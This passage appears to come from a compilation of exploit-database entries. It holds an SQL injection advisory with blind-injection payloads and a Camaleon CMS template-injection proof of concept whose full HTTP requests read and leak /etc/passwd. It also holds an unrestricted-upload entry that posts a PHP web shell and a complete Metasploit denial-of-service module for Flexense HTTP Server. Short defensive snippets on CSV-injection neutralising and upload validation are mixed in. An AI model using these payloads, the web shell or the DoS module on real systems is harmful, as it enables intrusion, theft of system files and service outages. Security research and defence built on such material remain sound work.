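                            quoting=csv.QUOTE_ALL, lineterminator="\n")
    writer.writeheader()
    for row in rows:
        writer.writerow({k: neutralize_cell(row.get(k, "")) for k in fieldnames})
    return buf.getvalue()


# Constructed sample records; the second first name is the advisory's payload.
SAMPLE_CUSTOMERS = [
    {"firstname": "Alice", "lastname": "Smith", "email": "alice@example.test"},
    {"firstname": "=calc|a!z|", "lastname": "Jones", "email": "mallory@example.test"},
    {"firstname": "+Bob", "lastname": "O'Neil", "email": "@bob"},
]

if __name__ == "__main__":
    print(export_customers_csv(SAMPLE_CUSTOMERS, ["firstname", "lastname", "email"]))
```

Numeric columns should be passed as numbers rather than strings, otherwise legitimate values such as "-5" or a phone number starting with "+" are also prefixed; the safer trade-off is still to escape them.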
-
SCRMS 2023-05-27 1.0 - Multiple SQL Injection
## Exploit Title: SCRMS 2023-05-27 1.0 - Multiple SQLi
## Author: nu11secur1ty
## Date: 05.27.2023
## Vendor: https://github.com/oretnom23
## Software: https://www.sourcecodester.com/php/15895/simple-customer-relationship-management-crm-system-using-php-free-source-coude.html
## Reference: https://portswigger.net/web-security/sql-injection

## Description:
The `email` parameter appears to be vulnerable to SQL injection attacks. The test payloads 45141002' or 6429=6429-- and 37491017' or 5206=5213-- were each submitted in the email parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way. The attacker can easily steal all users and their passwords for access to the system. Even if they are strongly encrypted this will take some time, but if they are not strongly encrypted enough, decrypting them is not a problem for an attacker.

STATUS: HIGH Vulnerability

[+]Payload:

```mysql
---
Parameter: email (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: email=-1544' OR 2326=2326-- eglC&password=c5K!k0k!T7&login=
---
```

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2023/SCRMS-2023-05-27-1.0)

## Proof and Exploit:
[href](https://www.nu11secur1ty.com/2023/05/scrms-2023-05-27-10-multiple-sqli.html)

## Time spend:
01:00:00

--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html and https://www.exploit-db.com/
home page: https://www.nu11secur1ty.com/
nu11secur1ty <http://nu11secur1ty.com/>
-
Camaleon CMS v2.7.0 - Server-Side Template Injection (SSTI)
Exploit Title: Camaleon CMS v2.7.0 - Server-Side Template Injection (SSTI)
Exploit Author: PARAG BAGUL
CVE: CVE-2023-30145

## Description
Camaleon CMS v2.7.0 was discovered to contain a Server-Side Template Injection (SSTI) vulnerability via the formats parameter.

## Affected Component
All versions below 2.7.0 are affected.

## Author
Parag Bagul

## Steps to Reproduce
1. Open the target URL: `https://target.com/admin/media/upload`
2. Upload any file and intercept the request.
3. In the `formats` parameter value, add the payload `test<%= 7*7 %>test`.
4. Check the response. It should return the result of 7*7 (49) inside the message "File format not allowed (dqopi49vuuvm)".

## Detection:

# Request:

POST /admin/media/upload?actions=false HTTP/1.1
Host: target.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://target.com/admin/profile/edit
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------327175120238370517612522354688
Content-Length: 1200
Origin: http://target.com
DNT: 1
Connection: close
Cookie: cookie

-----------------------------327175120238370517612522354688
Content-Disposition: form-data; name="file_upload"; filename="test.txt"
Content-Type: text/plain

test
-----------------------------327175120238370517612522354688
Content-Disposition: form-data; name="versions"

-----------------------------327175120238370517612522354688
Content-Disposition: form-data; name="thumb_size"

-----------------------------327175120238370517612522354688
Content-Disposition: form-data; name="formats"

test<%= 7*7 %>test
-----------------------------327175120238370517612522354688
Content-Disposition: form-data; name="media_formats"

image
-----------------------------327175120238370517612522354688
Content-Disposition: form-data; name="dimension"

-----------------------------327175120238370517612522354688
Content-Disposition: form-data; name="private"

-----------------------------327175120238370517612522354688
Content-Disposition: form-data; name="folder"

/
-----------------------------327175120238370517612522354688
Content-Disposition: form-data; name="skip_auto_crop"

true
-----------------------------327175120238370517612522354688--

# Response:

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200 OK
Cache-Control: max-age=0, private, must-revalidate
Set-Cookie: cookie
Content-Length: 41

File format not allowed (test49test)

## Exploitation:

To execute a command, add the following payload: testqopi<%= File.open('/etc/passwd').read %>fdtest

# Request:

POST /admin/media/upload?actions=true HTTP/1.1
Host: target.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://target.com/admin/media
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------104219633614133026962934729021
Content-Length: 1237
Origin: http://target.com
DNT: 1
Connection: close
Cookie: cookie

-----------------------------104219633614133026962934729021
Content-Disposition: form-data; name="file_upload"; filename="test.txt"
Content-Type: text/plain

test
-----------------------------104219633614133026962934729021
Content-Disposition: form-data; name="versions"

-----------------------------104219633614133026962934729021
Content-Disposition: form-data; name="thumb_size"

-----------------------------104219633614133026962934729021
Content-Disposition: form-data; name="formats"

dqopi<%= File.open('/etc/passwd').read %>fdfdsf
-----------------------------104219633614133026962934729021
Content-Disposition: form-data; name="media_formats"

-----------------------------104219633614133026962934729021
Content-Disposition: form-data; name="dimension"

-----------------------------104219633614133026962934729021
Content-Disposition: form-data; name="private"

-----------------------------104219633614133026962934729021
Content-Disposition: form-data; name="folder"

/
-----------------------------104219633614133026962934729021
Content-Disposition: form-data; name="skip_auto_crop"

true
-----------------------------104219633614133026962934729021--

# Response:

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200 OK
Set-Cookie: cookie
Content-Length: 1816

File format not allowed (dqopiroot:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
fdfdsf)
-
unilogies/bumsys v1.0.3 beta - Unrestricted File Upload
Exploit Title: unilogies/bumsys v1.0.3-beta - Unrestricted File Upload
Google Dork : NA
Date: 19-01-2023
Exploit Author: AFFAN AHMED
Vendor Homepage: https://github.com/unilogies/bumsys
Software Link: https://github.com/unilogies/bumsys/archive/refs/tags/v1.0.3-beta.zip
Version: 1.0.3-beta
Tested on: Windows 11, XAMPP-8.2.0
CVE : CVE-2023-0455

================================
Steps_TO_Reproduce
================================
- Navigate to this URL: https://demo.bumsys.org/settings/shop-list/
- Click on the action button to edit the profile.
- Click on the select logo button to upload the image.
- Intercept the POST request and make the changes below.

================================================================
Burpsuite-Request
================================================================
POST /xhr/?module=settings&page=updateShop HTTP/1.1
Host: demo.bumsys.org
Cookie: eid=1; currencySymbol=%EF%B7%BC; keepAlive=1; __0bb0b4aaf0f729565dbdb80308adac3386976ad3=9lqop41ssg3i9trh73enqbi0i7
Content-Length: 1280
Sec-Ch-Ua: "Chromium";v="109", "Not_A Brand";v="99"
X-Csrf-Token: 78abb0cc27ab54e87f66e8160dab3ab48261a8b4
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.75 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarynO0QAD84ekUMuGaA
Accept: */*
X-Requested-With: XMLHttpRequest
Sec-Ch-Ua-Platform: "Windows"
Origin: https://demo.bumsys.org
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://demo.bumsys.org/settings/shop-list/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

------WebKitFormBoundarynO0QAD84ekUMuGaA
Content-Disposition: form-data; name="shopName"

TEST
------WebKitFormBoundarynO0QAD84ekUMuGaA
Content-Disposition: form-data; name="shopAddress"

test
------WebKitFormBoundarynO0QAD84ekUMuGaA
Content-Disposition: form-data; name="shopCity"

testcity
------WebKitFormBoundarynO0QAD84ekUMuGaA
Content-Disposition: form-data; name="shopState"

teststate
------WebKitFormBoundarynO0QAD84ekUMuGaA
Content-Disposition: form-data; name="shopPostalCode"

700056
------WebKitFormBoundarynO0QAD84ekUMuGaA
Content-Disposition: form-data; name="shopCountry"

testIND
------WebKitFormBoundarynO0QAD84ekUMuGaA
Content-Disposition: form-data; name="shopPhone"

895623122
------WebKitFormBoundarynO0QAD84ekUMuGaA
Content-Disposition: form-data; name="shopEmail"

test@gmail.com
------WebKitFormBoundarynO0QAD84ekUMuGaA
Content-Disposition: form-data; name="shopInvoiceFooter"

------WebKitFormBoundarynO0QAD84ekUMuGaA
Content-Disposition: form-data; name="shopLogo"; filename="profile picture.php"
Content-Type: image/png

<?php echo system($_REQUEST['dx']); ?>
------WebKitFormBoundarynO0QAD84ekUMuGaA--

====================================================================================
Burpsuite-Response
====================================================================================
HTTP/1.1 200 OK
Date: Thu, 19 Jan 2023 07:14:26 GMT
Server: Apache/2.4.51 (Unix) OpenSSL/1.0.2k-fips
X-Powered-By: PHP/7.0.33
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 65

<div class='alert alert-success'>Shop successfully updated.</div>

====================================================================================
VIDEO-POC : https://youtu.be/nwxIoSlyllQ
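The request above is accepted because the server trusts the client-supplied filename and Content-Type. The following is an added example, not bumsys code, of how a logo upload handler would validate such a part: extension allowlist, declared type and leading magic bytes must all agree, polyglot image/PHP bodies are rejected, and the stored name is chosen by the server. Sample inputs are constructed.

```python
import os
import uuid

# Constructed allowlist: extension -> (leading magic bytes, expected Content-Type).
ALLOWED_IMAGES = {
    ".png":  (b"\x89PNG\r\n\x1a\n", "image/png"),
    ".jpg":  (b"\xff\xd8\xff",      "image/jpeg"),
    ".jpeg": (b"\xff\xd8\xff",      "image/jpeg"),
    ".gif":  (b"GIF8",              "image/gif"),
}
MAX_LOGO_BYTES = 2 * 1024 * 1024
# Byte sequences that must never appear inside an image we will serve from the web root.
FORBIDDEN_MARKERS = (b"<?php", b"<?=", b"<script")


def validate_logo_upload(filename, declared_type, data):
    """Return (accepted, reason).

    Accept only when the extension, the declared Content-Type and the first
    bytes of the body all agree on one allowed image type, the body is within
    size, and it carries no embedded script marker (image/PHP polyglots).
    """
    base = os.path.basename(filename.replace("\\", "/"))
    root, ext = os.path.splitext(base)
    ext = ext.lower()
    if ext not in ALLOWED_IMAGES:
        return False, "extension not allowed: %r" % ext
    if "." in root:                       # logo.php.png / logo.png.php style names
        return False, "multiple extensions not allowed"
    magic, expected_type = ALLOWED_IMAGES[ext]
    if declared_type.split(";")[0].strip().lower() != expected_type:
        return False, "Content-Type %r does not match %s" % (declared_type, ext)
    if not data.startswith(magic):
        return False, "content is not a %s file" % expected_type
    if len(data) > MAX_LOGO_BYTES:
        return False, "file too large"
    lowered = data.lower()
    if any(marker in lowered for marker in FORBIDDEN_MARKERS):
        return False, "embedded script marker in image data"
    return True, "ok"


def storage_name(validated_filename):
    """Server-chosen name: random stem plus the already validated extension,
    so the client never controls the path or extension under the web root."""
    ext = os.path.splitext(validated_filename)[1].lower()
    return "%s%s" % (uuid.uuid4().hex, ext)


if __name__ == "__main__":
    # Constructed stand-ins for the multipart part in the request above.
    print(validate_logo_upload("profile picture.php", "image/png", b"<?php echo 1; ?>"))
    print(validate_logo_upload("logo.png", "image/png", b"\x89PNG\r\n\x1a\n" + b"\x00" * 32))
```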
-
Flexense HTTP Server 10.6.24 - Buffer Overflow (DoS) (Metasploit)
```ruby
##
# Exploit Title: Flexense HTTP Server 10.6.24 - Buffer Overflow (DoS) (Metasploit)
# Date: 2018-03-09
# Exploit Author: Ege Balci
# Vendor Homepage: https://www.flexense.com/downloads.html
# Version: <= 10.6.24
# CVE : CVE-2018-8065
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Auxiliary::Dos
  include Msf::Exploit::Remote::Tcp

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Flexense HTTP Server Denial Of Service',
      'Description'    => %q{
        This module triggers a Denial of Service vulnerability in the Flexense HTTP server.
        The vulnerability is caused by a user mode write access memory violation and can be
        triggered by rapidly sending a variety of HTTP requests with long HTTP header values.
        Multiple Flexense applications that use Flexense HTTP server 10.6.24 and below versions
        are reportedly vulnerable.
      },
      'Author'         => [ 'Ege Balci <ege.balci@invictuseurope.com>' ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2018-8065'],
          [ 'URL', 'https://github.com/EgeBalci/Sync_Breeze_Enterprise_10_6_24_-DOS' ],
        ],
      'DisclosureDate' => '2018-03-09'))

    # Both options are integers; the original declared them as OptString, so the
    # count == datastore['PacketCount'] comparison below never matched.
    register_options(
      [
        Opt::RPORT(80),
        OptInt.new('PacketCount', [ true, "The number of packets to be sent (Recommended: Above 1725)", 1725 ]),
        OptInt.new('PacketSize', [ true, "The number of bytes in the Accept header (Recommended: 4088-5090)", rand(4088..5090) ])
      ])
  end

  def check
    begin
      connect
      sock.put("GET / HTTP/1.0\r\n\r\n")
      res = sock.get
      if res and res.include? 'Flexense HTTP Server v10.6.24'
        Exploit::CheckCode::Appears
      else
        Exploit::CheckCode::Safe
      end
    rescue Rex::ConnectionRefused
      print_error("Target refused the connection")
      Exploit::CheckCode::Unknown
    rescue
      print_error("Target did not respond to HTTP request")
      Exploit::CheckCode::Unknown
    end
  end

  def run
    unless check == Exploit::CheckCode::Appears
      fail_with(Failure::NotVulnerable, 'Target is not vulnerable.')
    end

    size = datastore['PacketSize'].to_i
    max_packets = datastore['PacketCount'].to_i
    print_status("Starting with packets of #{size}-byte strings")
    count = 0
    loop do
      payload = ""
      payload << "GET /" + Rex::Text.rand_text_alpha(rand(30)) + " HTTP/1.1\r\n"
      payload << "Host: 127.0.0.1\r\n"
      payload << "Accept: " + ('A' * size) + "\r\n"
      payload << "\r\n\r\n"
      begin
        connect
        sock.put(payload)
        disconnect
        count += 1
        break if count == max_packets
      rescue ::Rex::InvalidDestination
        print_error('Invalid destination! Continuing...')
      rescue ::Rex::ConnectionTimeout
        print_error('Connection timeout! Continuing...')
      rescue ::Errno::ECONNRESET
        print_error('Connection reset! Continuing...')
      rescue ::Rex::ConnectionRefused
        print_good("DoS successful after #{count} packets with #{size}-byte headers")
        return true
      end
    end
    print_error("DoS failed after #{count} packets of #{size}-byte strings")
  end
end
```